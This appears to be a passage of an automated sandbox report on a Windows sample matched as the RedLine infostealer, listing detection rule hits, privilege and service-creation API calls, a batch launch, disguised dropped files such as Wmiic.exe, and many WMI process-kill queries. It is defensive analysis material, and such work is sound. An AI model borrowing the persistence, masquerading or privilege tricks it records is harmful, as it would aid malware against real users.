Source: 00000000.00000002.3278134834.0000000002AA1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3275621443.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.file.exe.45edbe6.2.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.45edbe6.2.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.45edbe6.2.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7590000.7.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7590000.7.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7590000.7.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.4800ee8.5.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.4800ee8.5.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.4800ee8.5.raw.unpack, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: mig.exe.0.dr Binary or memory string: K.sLN
Source: mig.exe.0.dr Binary or memory string: C.vBp=)
Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@324/50@0/2
Source: C:\Users\123.exe Code function: 3_2_00EB6C74 GetLastError,FormatMessageW, 3_2_00EB6C74
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000A810 GetCurrentThread,OpenThreadToken,GetLastError,ImpersonateSelf,GetCurrentThread,OpenThreadToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle, 6_2_000000014000A810
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: _snwprintf_s,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle, 6_2_00000001400133A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 0_2_004019F0
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_0000000140012160 _snwprintf_s,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,GetProcessHeap,HeapFree,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,ChangeServiceConfig2W,GetLastError, 6_2_0000000140012160
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000A2E0 _snwprintf_s,PathQuoteSpacesW,GetModuleFileNameW,GetModuleFileNameW,PathQuoteSpacesW,TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError, 6_2_000000014000A2E0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\SystemCache Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4400:120:WilError_03
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe File created: C:\Windows\TEMP\_MEI65122 Jump to behavior
Source: C:\Users\123.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\MicrosoftSystem\run.bat" "
Source: C:\Users\user\Desktop\file.exe Command line argument: 08A 0_2_00413780
Source: C:\Users\123.exe Command line argument: C:\users 3_2_00ECDF1E
Source: C:\Users\123.exe Command line argument: sfxname 3_2_00ECDF1E
Source: C:\Users\123.exe Command line argument: sfxstime 3_2_00ECDF1E
Source: C:\Users\123.exe Command line argument: STARTDLG 3_2_00ECDF1E
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\SysWOW64\timeout.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v3.exe&quot;)
Source: C:\Windows\SysWOW64\net1.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;full_rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;full_rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v4.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WerFault.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;IntelConfigService.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v3.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;full_rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v3.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;full_rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v4.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v4.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WerFault.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WerFault.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v3.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;full_rdp_modul_v1.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v4.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v4.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;ape_modul_v1.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;nl.exe&quot;)
Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WerFault.exe&quot;)
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;WerFault.exe&quot;)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;full_rdp_modul_v1.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;migrate.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;IntelConfigService.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;MSTask.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Superfetch.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v3.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Wmiic.exe&quot;)
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Wrap.exe&quot;)
Source: C:\Windows\SysWOW64\takeown.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;wrm_modul_v2.exe&quot;)
Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;rdp_modul_v2.exe&quot;)
